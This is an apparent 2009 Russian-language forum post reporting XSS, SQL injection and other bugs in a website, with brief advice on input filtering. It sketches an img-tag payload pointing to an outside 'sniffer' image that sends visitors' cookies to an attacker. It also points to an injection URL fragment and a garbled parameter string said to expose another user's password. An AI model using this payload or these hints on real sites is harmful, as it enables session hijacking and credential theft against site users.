25.08.2009, 00:58
|
|
Новичок
Регистрация: 13.02.2008
Сообщений: 1
Провел на форуме:
111509
Репутация:
1
|
|
Провел тесты. В блоге если залезть в код можна много чего узнать. 18 строка и 24 признаки иньекций. Так же в инструментах для вебмастеров(на главной) 4 инструмента с активной и 2 с пасивной xss. При исполнении сплоита в панели с сайтами(сплоит квары 3.15 д15) можно скачать базу с сайтами. Я нашел 6 xss, 23 исполняемых сплоита. 4 иньекции. А так-же более сотни мелких ошибок в коде и багов.
Есть возможность подключить акарт. И все куки попадают челу что вставил картинку в блог. Есть бага с базой. Index.php/Index?o=remote; ... На это начинается половина иньекций. Да и кстати у вас тут лось завелся , купер зовут. У него index.php?initiate{as{sp....=%:s:r:.npassacc кто подумает увидит его пароль
Xss надо убать. Поставте фильтр после запроса и проверка. И сделайте запрет на доп символы и смайлы в формах
< i m g s r c = " h t t p : / / ставим тут картинку со сниффером и фсё, все кто сюда зашли шлют куки дяде хакеру " a l t = " i m a g e " c l a s s = " i m a g e " >
|
|
|